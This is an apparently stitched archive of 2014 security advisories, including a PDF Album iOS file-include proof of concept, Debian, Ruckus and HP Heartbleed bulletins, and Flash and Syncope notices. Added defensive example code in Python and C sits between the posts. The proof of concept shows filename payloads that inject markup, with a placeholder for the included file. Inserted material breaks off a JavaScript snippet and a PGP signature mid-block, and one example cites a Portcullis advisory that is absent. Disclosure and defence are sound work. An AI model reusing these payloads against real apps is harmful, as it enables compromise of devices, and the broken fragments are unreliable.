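A check of the kind this advisory implies, as an added example that is not Portcullis's tooling: it parses the RPATH/RUNPATH lines that `readelf -d` prints for a binary and flags search-path components an unprivileged user could influence (the current directory or an empty entry, relative entries, `$ORIGIN`-relative entries, and world-writable directories when the filesystem is consulted). The `readelf` output below is constructed; `find_setid_binaries` and `audit_binary` are helpers I added so the same classification can be run over the set-id programs of a real host.

```python
import os
import re
import stat
import subprocess

# readelf -d prints the two search-path tags like this (constructed sample):
#  0x000000000000000f (RPATH)              Library rpath: [/opt/vendor/lib:.]
#  0x000000000000001d (RUNPATH)            Library runpath: [/usr/lib64]
DYN_PATH_RE = re.compile(r"\((RPATH|RUNPATH)\)\s+Library r(?:un)?path:\s+\[(.*)\]")

SAMPLE_READELF = """\
Dynamic section at offset 0x1d8 contains 28 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000f (RPATH)              Library rpath: [/opt/vendor/lib:.:lib:$ORIGIN/../lib]
 0x000000000000001d (RUNPATH)            Library runpath: [/usr/lib64]
"""


def parse_dynamic_paths(readelf_output):
    """Return a list of (tag, [components]) from `readelf -d` text."""
    found = []
    for line in readelf_output.splitlines():
        m = DYN_PATH_RE.search(line)
        if m:
            found.append((m.group(1), m.group(2).split(":")))
    return found


def classify_component(comp, check_fs=True):
    """Reason string if `comp` is unsafe in a set-id binary's search path, else None."""
    if comp in ("", "."):
        return "empty/current-directory entry, resolved relative to the caller's cwd"
    if "$ORIGIN" in comp or "${ORIGIN}" in comp:
        return "$ORIGIN-relative entry, safe only if the binary's directory is not writable by unprivileged users"
    if not comp.startswith("/"):
        return "relative path entry, resolved relative to the caller's cwd"
    if check_fs and os.path.isdir(comp):
        st = os.stat(comp)
        if st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
            return "world-writable directory"
        if st.st_uid != 0:
            return "directory owned by uid %d, not root" % st.st_uid
    return None


def audit(readelf_output, check_fs=True):
    """Return [(tag, component, reason)] for every unsafe search-path component."""
    findings = []
    for tag, comps in parse_dynamic_paths(readelf_output):
        for comp in comps:
            reason = classify_component(comp, check_fs)
            if reason:
                findings.append((tag, comp, reason))
    return findings


def find_setid_binaries(root="/usr"):
    """Yield regular files under `root` carrying the set-user-ID or set-group-ID bit."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield p


def audit_binary(path):
    """Run readelf on a real binary and audit its RPATH/RUNPATH (needs binutils installed)."""
    out = subprocess.run(["readelf", "-d", path], capture_output=True, text=True, check=False)
    return audit(out.stdout)


if __name__ == "__main__":
    # Offline run over the constructed sample; filesystem checks are skipped.
    for tag, comp, reason in audit(SAMPLE_READELF, check_fs=False):
        print("%-8s %-20s %s" % (tag, comp, reason))
```

On a live system, `for p in find_setid_binaries("/"): print(p, audit_binary(p))` gives the list a patch-management team would want before and after applying a vendor fix; an empty result for a set-id binary means no user-influenceable search path was found, not that the binary is otherwise safe.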


PDF Album v1.7 iOS - File Include Web Vulnerability

2014-04-15 Thread Vulnerability Lab
Document Title:
===
PDF Album v1.7 iOS - File Include Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1255


Release Date:
=
2014-04-11


Vulnerability Laboratory ID (VL-ID):

1255


Common Vulnerability Scoring System:

7.3


Product & Service Introduction:
===
Here is a creative way to record an idea, a page in a book or newspapers, what 
you learned, even a travel memory. You can get content from camera, 
image or text editor, then pick them up into a pdf file and compose them as you 
wish. You can order the pages in project, then save the project 
and open it again when you want to add or change it. You can get pdfs via WIFI 
or read them in this app.

(Copy of the Homepage: https://itunes.apple.com/ch/app/pdf-album/id590232990 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a local file include web 
vulnerability in the official PDF Album v1.7 iOS mobile application.


Vulnerability Disclosure Timeline:
==
2014-04-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Lintao Zhao
Product: PDF Album - iOS Mobile Application 1.7


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A local file include web vulnerability has been discovered in the official PDF 
Album v1.7 iOS mobile web-application. The local file include 
web vulnerability allows remote attackers to include unauthorized local 
file/path requests or system specific path commands to compromise 
the mobile web-application.

The web vulnerability is located in the `filename` value of the `upload` 
module. Remote attackers are able to inject own files with malicious 
`filename` values in the `upload` POST method request to compromise the mobile 
web-application. The local file/path include execution occurs 
in the `pdf album index item` list context. The attacker can inject the local 
file include request by usage of the `wifi interface` or by a local 
privileged application user account via `folder sync`.

Attackers are also able to exploit the filename validation issue in combination 
with persistent injected script codes to execute different 
local malicious attack requests. The attack vector is on the application-side 
of the wifi service and the request method to inject is POST. The security 
risk of the local file include web vulnerability is estimated as high(+) with a 
cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9.

Exploitation of the local file include web vulnerability requires no user 
interaction but a privileged web-application user account with low user auth. 
Successful exploitation of the local file include web vulnerability results in 
mobile application or connected device component compromise.

Request Method(s):
[+] [POST] - Remote
[+] [SYNC] - Local

Vulnerable Module(s):
[+] Browse File & Upload

Vulnerable Parameter(s):
[+] filename.*.pdf

Affected Module(s):
[+] PDF Album - Index Item Listing 
(http://localhost:8808/)


Proof of Concept (PoC):
===
The local file include web vulnerability can be exploited by local attackers 
with a low privileged user account and without required user interaction.
For security demonstration or to reproduce the local file include vulnerability 
follow the provided information and steps below to continue.

PoC: Exploit Code

<table cellpadding="0" cellspacing="0" border="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr></thead>
<tbody id="filelist">
<tr><td><a href="/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf" class="file">
./[LOCAL FILE INCLUDE VULNERABILITY VIA PDF ALBUMNAME!.pdf</a></td><td class='del'>
<form action='/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf' method='post'><input name='_method' value='delete' type='hidden'/>
<input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr>
<tr class="shadow"><td><a href="/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf" class="file">%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf</a></td><td class="del">
<form action="/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf" method="post">
<input name="_method" value="delete" type="hidden"><input name="commit" value="Delete" class="button" type="submit"></form></td></tr></tbody></table>


PoC: Vulnerable Source

<script type="text/javascript" charset="utf-8">
var now = new Date();
$.getJSON("/files?" + now.toString(),
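The advisory above describes an uploaded `filename` that ends up in the index listing's `href`, anchor text and delete-form `action` without validation or escaping. As an added example, not part of the advisory and not PDF Album's own code, here is the pair of server-side checks a defender would want at that point: a hypothetical allow-list validator for upload names (`upload_filename_is_safe`) and an HTML escaper applied when a stored name is rendered into the listing (`html_escape`). Both function names and the sample names in `main` are assumptions constructed for this example.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not PDF Album's code. upload_filename_is_safe() is a
 * hypothetical allow-list check for the `filename` value of an upload:
 * only letters, digits, space, '-', '_' and single dots are accepted,
 * the name must end in ".pdf", and names starting with '.' (hidden
 * files, "..") or containing path separators, quotes or angle brackets
 * are rejected, so a stored name can neither leave the upload directory
 * nor carry markup into the listing. */
bool upload_filename_is_safe(const char *name)
{
    size_t len = strlen(name);
    if (len < 5 || len > 128)                 /* shortest valid: "x.pdf" */
        return false;
    if (strcmp(name + len - 4, ".pdf") != 0)
        return false;
    if (name[0] == '.' || name[0] == ' ')
        return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (isalnum(c) || c == '-' || c == '_' || c == ' ')
            continue;
        if (c == '.' && name[i + 1] != '.')   /* single dots only, no ".." */
            continue;
        return false;                         /* everything else rejected */
    }
    return true;
}

/* Escape the characters HTML treats as markup so that a stored name is
 * rendered as text in the index listing rather than parsed as tags or
 * attribute delimiters. Returns bytes written (without the NUL) or -1 if
 * out is too small. */
int html_escape(const char *in, char *out, size_t out_sz)
{
    size_t o = 0;
    for (const char *p = in; *p; p++) {
        const char *rep = NULL;
        switch (*p) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (o + n + 1 > out_sz)
            return -1;
        if (rep)
            memcpy(out + o, rep, n);
        else
            out[o] = *p;
        o += n;
    }
    out[o] = '\0';
    return (int)o;
}

int main(void)
{
    /* Constructed sample names: a normal upload and two shaped like the
     * advisory's proof of concept (markup, and a relative path, in the name). */
    const char *names[] = { "holiday-2014.pdf", ">\"<./[MARKER]>.pdf", "../x.pdf" };
    char buf[256];
    for (size_t i = 0; i < 3; i++) {
        bool ok = upload_filename_is_safe(names[i]);
        html_escape(names[i], buf, sizeof buf);
        printf("%-22s accepted=%d  rendered as: %s\n", names[i], ok, buf);
    }
    return 0;
}
```

Validation at upload time and escaping at render time are independent layers: the first keeps a hostile name out of the store, the second makes sure that whatever is in the store is shown as text, so a bypass of one does not defeat the other.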

[SECURITY] [DSA 2903-1] strongswan security update

2014-04-15 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2903-1   secur...@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
April 14, 2014 http://www.debian.org/security/faq
- -

Package: strongswan
CVE ID : CVE-2014-2338

An authentication bypass vulnerability was found in charon, the daemon
handling IKEv2 in strongSwan, an IKE/IPsec suite. The state machine
handling the security association (IKE_SA) handled some state transitions
incorrectly.

An attacker can trigger the vulnerability by rekeying an unestablished
IKE_SA during the initiation itself. This will trick the IKE_SA state to
'established' without the need to provide any valid credential.

Vulnerable setups include those actively initiating IKEv2 IKE_SA (like
“clients” or “roadwarriors”) but also during re-authentication (which
can be initiated by the responder). Installations using IKEv1 (pluto
daemon in strongSwan 4 and earlier, and IKEv1 code in charon 5.x) are not
affected.

For the oldstable distribution (squeeze), this problem has been fixed in
version 4.4.1-5.5.

For the stable distribution (wheezy), this problem has been fixed in
version 4.5.2-1.5+deb7u3.

For the unstable distribution (sid), this problem has been fixed in
version 5.1.2-4.

We recommend that you upgrade your strongswan packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org




-BEGIN PGP SIGNATURE-
Version: GnuPG v1
-END PGP SIGNATURE-



VUPEN Security Research - Adobe Flash ExternalInterface Use-After-Free Code Execution (Pwn2Own)

2014-04-15 Thread VUPEN Security Research
VUPEN Security Research - Adobe Flash ExternalInterface Use-After-Free
Code Execution (Pwn2Own)

Website : http://www.vupen.com

Twitter : http://twitter.com/vupen


I. BACKGROUND
-

Adobe Flash Player is a cross-platform browser-based application runtime
that delivers viewing of expressive applications, content, and videos
across screens and browsers. It is installed on 98% of computers.


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered a critical vulnerability
in Adobe Flash.

The vulnerability is caused by a use-after-free error when interacting
with the ExternalInterface class from the browser, which could be
exploited to achieve code execution via a malicious web page.


III. AFFECTED PRODUCTS
---

Adobe Flash versions prior to 13.0.0.182


IV. SOLUTION


Upgrade to Adobe Flash v13.0.0.182.


V. CREDIT
--

This vulnerability was discovered by VUPEN Security.


VI. ABOUT VUPEN Security
---

VUPEN is the leading provider of defensive and offensive cyber security
intelligence and advanced zero-day research. All VUPEN's vulnerability
intelligence results exclusively from its internal and in-house R&D
efforts conducted by its team of world-class researchers.

VUPEN Solutions: http://www.vupen.com/english/services/


VII. REFERENCES
--

http://helpx.adobe.com/security/products/flash-player/apsb14-09.html
http://zerodayinitiative.com/advisories/ZDI-14-092/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0506


VIII. DISCLOSURE TIMELINE
-

2014-01-28 - Vulnerability Discovered by VUPEN Security
2014-03-13 - Vulnerability Reported to Adobe During Pwn2Own 2014
2014-04-08 - Vulnerability Fixed by Adobe
2014-04-14 - Public disclosure



RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library's Heart bleed vulnerability - CVE-2014-0160

2014-04-15 Thread Ruckus Product Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

RUCKUS ADVISORY ID 041414

Customer release date: April 14, 2014
Public release date: April 14, 2014

TITLE

OpenSSL 1.0.1 library's Heart bleed vulnerability - CVE-2014-0160


SUMMARY

OpenSSL library is used in Ruckus products to implement various
security related features. A vulnerability has been discovered in
OpenSSL library which may allow an unauthenticated, remote attacker to
retrieve memory in chunks of 64 kilobytes from a connected client or
server.  An exploit could disclose portions of memory containing
sensitive security material such as passwords and private keys.


AFFECTED SOFTWARE VERSIONS AND DEVICES


Device                        Affected software
------                        -----------------
Smart Cell Gateway            1.1.x
SmartCell Access Points       NOT AFFECTED
ZoneDirector Controllers      NOT AFFECTED
ZoneFlex Access Points        NOT AFFECTED


Any products or services not mentioned in the table above are not affected


DETAILS

A vulnerability has been discovered in the popular OpenSSL
cryptographic software library. This weakness exists in OpenSSL's
implementation of the TLS/DTLS (transport layer security protocols)
heartbeat extension (RFC6520). This vulnerability is due to a missing
bounds check in implementation of the handling of the heartbeat
extension. When exploited, this issue may lead to leak of memory
contents from the server to the client and from the client to the
server. These memory contents could contain sensitive security
material such as passwords and private keys.


IMPACT

Ruckus devices incorporate OpenSSL library to implement various
security related features. Below is list of the affected components:

-  Administrative HTTPS Interface (Port 8443)


CVSS v2 Base Score:5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N)


   
WORKAROUNDS

Ruckus recommends that all customers apply the appropriate patch(es)
as soon as practical.  However, in the event that a patch cannot
immediately be applied, the following suggestions might help reduce
the risk:

 - Do not expose administrative interfaces of Ruckus devices to
untrusted networks such as the Internet.

 - Use a firewall to limit traffic to/from Ruckus device's
administrative interface to trusted hosts.

 

SOLUTION

Ruckus recommends that all customers apply the appropriate patch(es)
as soon as practical.

The following software builds have the fix (any later builds will also
have the fix):


Branch        Software Build
------        --------------
1.1.x         1.1.2.0.142




DISCOVERY

This vulnerability was disclosed online on various sources:

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
- https://www.openssl.org/news/secadv_20140407.txt
- http://heartbleed.com/




OBTAINING FIXED FIRMWARE

Ruckus customers can contact Ruckus support to obtain the fixed firmware

Ruckus Support contact list is at:
https://support.ruckuswireless.com/contact-us


PUBLIC ANNOUNCEMENTS

This security advisory will be made available for public consumption
on April 14, 2014 at the following source

Ruckus Website
http://www.ruckuswireless.com/security

SecurityFocus Bugtraq
http://www.securityfocus.com/archive/1


Future updates of this advisory, if any, will be placed on Ruckus's
website, but may or may not be actively announced on mailing lists.

REVISION HISTORY

  Revision 1.0 / 14th April 2014 / Initial release


RUCKUS WIRELESS SECURITY PROCEDURES

Complete information on reporting security vulnerabilities in Ruckus Wireless
products and obtaining assistance with security incidents is available at
  http://www.ruckuswireless.com/security
 
 
For reporting new security issues, email can be sent to
security(at)ruckuswireless.com
For sensitive information we encourage the use of PGP encryption. Our
public keys can be found at http://www.ruckuswireless.com/security

  
STATUS OF THIS NOTICE: Final

Although Ruckus cannot guarantee the accuracy of all statements
in this advisory, all of the facts have been checked to the best of our
ability. Ruckus does not anticipate issuing updated versions of
this advisory unless there is some material change in the facts. Should
there be a significant change in the facts, Ruckus may update this
advisory.


(c) Copyright 2014 by Ruckus Wireless
This advisory may be redistributed freely after the public release
date given at
the top of the text, provided that redistributed copies are complete and
unmodified, including all date and version information.
-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2.0.18 (Darwin)
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN
MqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0
AywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf
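The Ruckus DETAILS section above attributes CVE-2014-0160 to a missing bounds check in the handling of the RFC 6520 heartbeat extension, and the HP bulletin further down reports the same OpenSSL 1.0.1e issue. As an added example, not code from either advisory or from OpenSSL, here is a small C model of heartbeat message processing that includes the length check the vulnerable versions lacked. `heartbeat_parse` and `heartbeat_build_response` are hypothetical names, and `GOOD_REQ`/`BAD_REQ` are constructed sample records.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Ruckus, HP or OpenSSL code. Models the RFC 6520
 * HeartbeatMessage layout: 1-byte type, 2-byte payload_length, payload,
 * then at least 16 bytes of padding. */
#define HB_REQUEST      1
#define HB_RESPONSE     2
#define HB_MIN_PADDING  16
#define HB_HEADER_LEN   3

struct heartbeat {
    uint8_t        type;
    uint16_t       payload_length;   /* as advertised on the wire */
    const uint8_t *payload;          /* points into the received record */
};

/* The bounds check CVE-2014-0160 lacked: the advertised payload_length
 * plus header and minimum padding must fit inside the bytes actually
 * received; otherwise a responder echoing payload_length bytes would copy
 * memory beyond the record. RFC 6520 says such a message is discarded. */
bool heartbeat_parse(const uint8_t *rec, size_t rec_len, struct heartbeat *hb)
{
    if (rec_len < HB_HEADER_LEN + HB_MIN_PADDING)
        return false;
    uint8_t type = rec[0];
    if (type != HB_REQUEST && type != HB_RESPONSE)
        return false;
    uint16_t plen = (uint16_t)((rec[1] << 8) | rec[2]);
    if ((size_t)HB_HEADER_LEN + plen + HB_MIN_PADDING > rec_len)
        return false;                    /* claimed length exceeds record */
    hb->type = type;
    hb->payload_length = plen;
    hb->payload = rec + HB_HEADER_LEN;
    return true;
}

/* Builds a HeartbeatResponse that echoes exactly the validated payload.
 * Padding is zeroed here for determinism; a real stack uses random bytes.
 * Returns the response length, or 0 for a malformed or non-request
 * message or when out cannot hold the response. */
size_t heartbeat_build_response(const uint8_t *req, size_t req_len,
                                uint8_t *out, size_t out_sz)
{
    struct heartbeat hb;
    if (!heartbeat_parse(req, req_len, &hb) || hb.type != HB_REQUEST)
        return 0;
    size_t need = HB_HEADER_LEN + hb.payload_length + HB_MIN_PADDING;
    if (need > out_sz)
        return 0;
    out[0] = HB_RESPONSE;
    out[1] = (uint8_t)(hb.payload_length >> 8);
    out[2] = (uint8_t)(hb.payload_length & 0xff);
    memcpy(out + HB_HEADER_LEN, hb.payload, hb.payload_length);
    memset(out + HB_HEADER_LEN + hb.payload_length, 0, HB_MIN_PADDING);
    return need;
}

/* Constructed sample records. GOOD_REQ carries a 5-byte payload and 16
 * bytes of padding; BAD_REQ advertises 65535 payload bytes while the
 * record holds only one, the shape a checker must reject. */
static const uint8_t GOOD_REQ[] = {
    HB_REQUEST, 0x00, 0x05, 'h', 'e', 'l', 'l', 'o',
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};
static const uint8_t BAD_REQ[] = {
    HB_REQUEST, 0xff, 0xff, 'x',
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

int main(void)
{
    uint8_t out[64];
    size_t n = heartbeat_build_response(GOOD_REQ, sizeof GOOD_REQ, out, sizeof out);
    printf("well-formed request: response of %zu bytes\n", n);
    n = heartbeat_build_response(BAD_REQ, sizeof BAD_REQ, out, sizeof out);
    printf("oversized length field: response of %zu bytes (discarded)\n", n);
    return 0;
}
```

The essential point is that the length used for the copy comes from the peer, so it must be compared against the number of bytes actually received before any byte is read; the same check is what the OpenSSL fix referenced in the DISCOVERY links adds.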

[SECURITY] CVE-2014-0111 Apache Syncope

2014-04-15 Thread Francesco Chicchiriccò


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2014-0111: Remote code execution by an authenticated administrator

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Syncope 1.0.0 to 1.0.8
Syncope 1.1.0 to 1.1.6

Description:
In the various places in which Apache Commons JEXL expressions are 
allowed (derived schema definition, user / role templates, account links 
of resource mappings) a malicious administrator can inject Java code 
that can be executed remotely by the JEE container running the Apache 
Syncope core.


Credit:
This issue was discovered by Grégory Draperi.

References:
http://syncope.apache.org/security.html

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBAgAGBQJTTOJyAAoJEGtDE+0nPfKHxWcIAI9POTzr4bIF7fXO25uXgfny
BO8SR0fmGScdmeohf8nQZbUNgKA1F7YRe5vC9r8nKFSpdDJrMnPSTOwMYrgdOxHt
Rl/SpEab4b8NX0FO1a6TObDbXBDj+Q+4cNUXOOc0jC7lU67n1SorfGaMbjLfcZ0w
2xnZsbAQ0P0bmIJ2mR+LuXLsEA3kwvClF9fUTEDlJ4Rm/yT16UGvD5+vEJdMQzen
JhBdT8VeX4wvtYr9+WmmWqeWgvSmezE07s5Pu36qXkxAEFGzdQBtJ/XJbpbgM7Sa
7MoZQHQqJ5VwUVGMseqcxhAjD065uHP41HpAeF4TFQvp4jg8/FiybFdXqiJ+smI=
=4XQi
-END PGP SIGNATURE-



[security bulletin] HPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information

2014-04-15 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04240206

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04240206
Version: 1

HPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure
of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-15
Last Updated: 2014-04-15

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP XP P9500 Disk
Array running OpenSSL. This is the OpenSSL vulnerability known as Heartbleed
which could be exploited remotely resulting in disclosure of information.

References: CVE-2014-0160, SSRT101506

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP XP P9500 Disk Array OSS 70-06-00/00 and 70-06-01/00 when running Apache
2.2.24

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference              Base Vector                    Base Score
CVE-2014-0160            (AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP is actively working to address this vulnerability for the impacted
versions of HP XP P9500 Disk Array. This bulletin will be revised when the
software updates are released.

The two versions of Apache available in OSS 70-06-00/00 and 70-06-01/00 are:

Apache 2.2.10 (with OpenSSL 0.9.8o) which is not impacted by CVE-2014-0160
Apache 2.2.24 (with OpenSSL 1.0.1e) which is impacted by CVE-2014-0160

Until a new version is available, keep the SVP(s) on an array on the earlier
version of Apache available from the OSS image (version 2.2.10)

HISTORY
Version:1 (rev.1) - 15 April 2014 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.19 (GNU/Linux)

iEYEARECAAYFAlNNOSEACgkQ4B86/C0qfVl7IwCcCAFossT9cI/G1w8Zjt125fWa
wwQAnR+wDpUBjcU/REah/pNV80/+VNeR
=Do3J
-END PGP SIGNATURE-


[SECURITY] [DSA 2904-1] virtualbox security update

2014-04-15 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2904-1   secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
April 15, 2014 http://www.debian.org/security/faq
- -

Package: virtualbox
CVE ID : CVE-2014-0981 CVE-2014-0983

Francisco Falcon discovered that missing input sanitising in the 3D 
acceleration code in VirtualBox could lead to the execution of arbitrary 
code on the host system.

For the oldstable distribution (squeeze), these problems have been fixed in
version 3.2.10-dfsg-1+squeeze3.

For the stable distribution (wheezy), these problems have been fixed in
version 4.1.18-dfsg-2+deb7u3.

For the testing distribution (jessie), these problems have been fixed in
version 4.3.10-dfsg-1.

For the unstable distribution (sid), these problems have been fixed in
version 4.3.10-dfsg-1.

We recommend that you upgrade your virtualbox packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
-END PGP SIGNATURE-